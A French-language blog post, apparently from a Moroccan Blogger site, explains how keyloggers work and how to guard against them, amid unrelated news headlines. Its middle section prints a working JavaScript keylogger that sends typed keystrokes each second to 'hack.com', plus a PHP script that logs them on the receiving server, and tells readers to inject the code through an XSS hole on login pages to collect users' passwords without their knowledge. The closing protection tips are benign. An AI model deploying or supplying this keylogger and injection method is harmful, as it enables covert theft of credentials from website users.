Headlines

Le Fondateur de Facebook fait un don de 25 M$ pour la lutte contre Ebola

15 Oct 2014 / undefined Comments

Mark Zuckerberg, le patron de Facebook a annoncé avoir effectué un don de 25 M$ pour la lutte contre Ebola. Dans son poste, il affirme que nous avons besoin de maîtriser le virus Ebola à court terme pour qu'il ne se développe pas davantage et ne devienne pas une crise sanitaire mondiale de

Read More...

الأخبار
MAROCK

Musée Mohammed VI d'art moderne et contemporain à Rabat

Le Musée Mohammed-VI d'art moderne et contemporain (MMVI), premier musée national construit par le royaume...

Allemagne prête 3,54 milliards de dirhams au Maroc

Un nouvel accord de 360 millions d’euros de dons et de prêts de l’Allemagne pour le Maroc vient d’être sig...

International

Le Fondateur de Facebook fait un don de 25 M$ pour la lutte contre Ebola

Mark Zuckerberg, le patron de Facebook a annoncé avoir effectué un don de 25 M$ pour la lutte contre Ebo...

Prix Nobel de Littérature 2014.. Patrick Modiano

Prix Nobel de Littérature 2014   Le prix de Littérature a été décerné à Patrick Modiano (69 ans) ...

Etudiant : COURS||DISSERTATION||EXPOSE||RECHERCHE
sport

BADR HARI Le KO Le Meilleur Du monde

L'un Des Combats Les Plus Violents de BADR  HARI (VIDEO) ...

high-tech

Opensource au maroc

Logiciel libre : le grand oublié du Plan Maroc Numeric 2013 Moindre coût, di...

Ericsson et SAP ensemble pour fournir des solutions M2M

L’équipementier Suédois Ericsson et l’éditeur Allemand SAP veulent simplifier la mise en place d’applica...

Fonctionnement Lunettes de Google

Google lunettes nouveau ou une nouvelle révolution dans le monde de la technologie. Ces futurs verres peu...

La Nouvelle PlayStation 4 est arrivée

Le 20 février sera le jour où le constructeur japonais Sony dévoilera sa nouvelle console de jeux PlayStat...

Informatique

"’EDI" Electronic Data Interchange

L’EDI (Electronic Data Interchange) est un concept d’échange de données informatisé visant à transférer d’...

Mon PC chauffe ..solutions

Vous avez un énorme problème de surchauffe de votre PC portable, vous avez remarqué que votre ordinateur cha...

BIOS : protéger le démarrage du PC avec un mot de passe

Protéger un ordinateur, ses logiciels et ses documents passe avant tout par sa protection contre les atte...

finance

Le rôle du marché financier dans l'économie

Le rôle du marché financier dans l'économie Un marché est le lieu où se rencontrent une offre et une dem...

gestion

Clés pour reussir un Business Plan

Les 6 parties clés du business plan 1. Introduction du business plan Pour l'introduction du business pla...

Destination du week
Musik

    بكرا نهار جديد

    بكرا نهار جديد هي أغنية من وحي ثورات الربيع العربي التي عمت الدول العربية عامي 2010ء2011. وشارك فيها مجمو More...

MAROCK
Publié :dimanche 27 janvier 2013
Par EDVAC

keylogger:fonctionnement, utilisation et protection


Funinformatique

Un keylogger est un programme malicieux chargé dans la mémoire de votre ordinateur et qui va récupérer tout ce que vous saisissez au clavier : vos mots de passe, vos informations bancaires, etc… Une personne malveillante peut ensuite y retrouver et exploter les divers logins et mots de passe de votre ordinateur.


Certains keyloggers sont capables d’enregistrer les URL visitées, les courriers électroniques consultés ou envoyés, les fichiers ouverts, des captures d’écran voire de créer une vidéo retraçant toute l’activité de l’ordinateur.

Dans cet article on va voir comment fonctionne les keyloggers,  comment mettre en place un keylogger écrit en JavaScript et comment s’en protéger ?

Le fonctionnement des keyloggers

Un keylogger peut être matériel ou logiciel. Un keylogger matériel est un dispositif qui peut être fixé au clavier, au câble ou au bloc système de l’ordinateur.
keylogger materiel Les keyloggers: fonctionnement, utilisation et protection
Ils sont petites, se branchent entre le port PS2 du PC et le connecteur du clavier.  Ils ne coûtent pas cher, on en trouve en vente partout  et ils sont indétectables par les antivirus. Bref, l’idéal sauf si l’utilisateur regarde souvent derrière son PC pour vérifier.
Un keylogger logiciel est un programme spécialement développé pour suivre les frappes au clavier et transmettre ces informations dans un fichier.
les keyloggers s’installe :
  •  lors de l’ouverture d’un fichier joint à un message ;
  • à l’ouverture d’un fichier se trouvant dans un répertoire partagé d’un réseau P2P ;
  • à l’aide d’un script sur une page Web qui exploite les particularités d’un navigateur permettant au programme d’être exécuté automatiquement dès qu’un utilisateur accède à la page ;
  • etc
Ils existent plusieurs techniques pour la construction de keyloggers logiciels les plus populaires:
  • Piège système pour la communication d’une frappe au clavier (installé à l’aide de la fonction WinAPI SetWindowsHook sur les messages envoyés par la procédure de fenêtre ; programmé en langage C ou Java) ;
  • Requête cyclique du clavier (à l’aide de la fonction WinAPI Get(Async)KeyState, GetKeyboardState ; programmé le plus souvent en VisualBasic, plus rarement en Borland Delphi) ;
  • Utilisation d’un filtre pilote (requiert des connaissances spéciales ; programmé en C)

Comment mettre en place un keylogger Javascript ?

J’ai choisi l’utilisation du langage JavaScript pour de multiple raisons.  Ainsi, si l’on découvre unefaille XSS dans un site internet , il sera assez facile d’y injecter le bout de code sur une page de login par exemple. On pourra  ainsi collecter l’ensemble des logins/passwords des utilisateurs à leur insu.
Voici un exemple de keylogger écrit en JavaScript :
01<script language="javascript">
02 
03var keys='';
04document.onkeypress = function(e) {
05 get = window.event?event:e;
06 key = get.keyCode?get.keyCode:get.charCode;
07 key = String.fromCharCode(key);
08 keys+=key;
09}
10window.setInterval(function(){
11 new Image().src = 'http://hack.com/keylogger.php?c='+keys;
12 keys = '';
13}, 1000);
14</script>
Ici, le script Javascript récupère tout ce qui est saisi au clavier (fonction onkeypress) dans une variable appelée key. A côté de cela, la fonction setInterval attend une seconde avant de d’envoyer les données vers un serveur distant (serveur pirate).
Sur le serveur distant, on trouvera un script similaire à celui-ci, qui aura pour fonction la réception des données envoyées par le keylogger :
1<?php
2if(!empty($_GET['c'])) {
3 $f=fopen("logkey.txt","a+");
4 fwrite($f,$_GET['c']);
5 fclose($f);
6}
7?>
Il vous reste d’injecter le premier script dans un site contenant une faille XSS.

Comment se protéger des keyloggers ?

Les keyloggers sont très dangereux parce que c’est très difficile de les surveiller par un antivirus ou par le gestionnaire des taches.
Cependant, il existe un logiciel gratuit KeyScrambler qui permet de  crypter ce que vous saisissez au clavier directement au niveau du pilote de votre clavier, empêchant ainsi les logiciels malveillants de récupérer vos informations personnelles. Vous bénéficiez ainsi d’une protection à la fois contre les Keyloggers connus et inconnus.
Quand à moi, je vous propose une solution moins pratique mais permettant de contrer la plupart des keyloggers quel que soit leur type (Celà n’est évidement pas infaillible à 100% comme tout les logiciels).
C’est le clavier virtuel de Microsoft !
Il suffit de cliquer sur Démarrer / Exécuter et de taper la commande suivante : osk.exe
Cette application  se comporte exactement comme un clavier sauf que pour ecrire vous cliquez sur les touches avec votre souris.

Auteur

Ecrit parEDVAC on 1/27/2013. sous , . suivez les réponses à cette entrée via son RSS 2.0.

By EDVAC on 1/27/2013. Filed under , . Follow any responses to the RSS 2.0. Leave a response

Gagner de L'argent

Traduire

Fourni par Blogger.
  1. Volubilis
  2. Musée Mohammed VI d'art moderne et contemporain à Rabat
  3. Le Fondateur de Facebook fait un don de 25 M$ pour la lutte contre Ebola
  4. Allemagne prête 3,54 milliards de dirhams au Maroc
  5. Prix Nobel d'économie..Jean Tirole
  6. Que Faire a Marrakech ...!